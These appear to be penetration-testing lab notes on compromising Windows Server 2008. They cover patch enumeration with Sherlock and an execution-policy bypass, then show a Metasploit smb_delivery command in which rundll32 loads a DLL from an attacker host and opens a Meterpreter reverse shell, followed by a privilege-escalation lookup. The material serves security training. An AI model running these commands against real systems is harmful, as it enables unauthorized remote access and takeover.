Server 2008/2008 R2 were made end-of-life on January 14, 2020
Penetration testers need to understand the client's core business and hold discussions during the assessment, especially when dealing with scanning/enumeration and attacking legacy systems, and during the reporting phase.
Exploiting Windows Server 2008
For an older OS like Windows Server 2008, we can use an enumeration script like Sherlock to look for missing patches. We can also use something like Windows-Exploit-Suggester, which takes the results of the systeminfo command as an input, and compares the patch level of the host against the Microsoft vulnerability database to detect potential missing patches on the target. If an exploit exists in the Metasploit framework for the given missing patch, the tool will suggest it.
Method:
Querying Current Patch Level
wmic qfe
Running Sherlock
Set-ExecutionPolicy bypass -Scope process
Import-Module .\Sherlock.ps1
Find-AllVulns
this will list out the CVEs and status (Vulnerable or not)
Obtaining a Meterpreter Shell
one easy way is using the smb_delivery module as server 2008 is vulnerable to this.
msf> search smb_delivery
msf> set target 0 -> set target to DLL
only set the LHOST parameter, not the SRVHOST
msf> exploit
provides an exploit payload - rundll32.exe \\10.10.14.6\lEUZam\test.dll,0
Run command on target
rundll32.exe \\10.10.14.6\lEUZam\test.dll,0
Receive a revshell
meterpreter session opened
background the meterpreter shell
Searching for Local Privilege Escalation Exploit
Now, based on the Sherlock results, we can search 2010-3338 (task scheduler XML privesc)
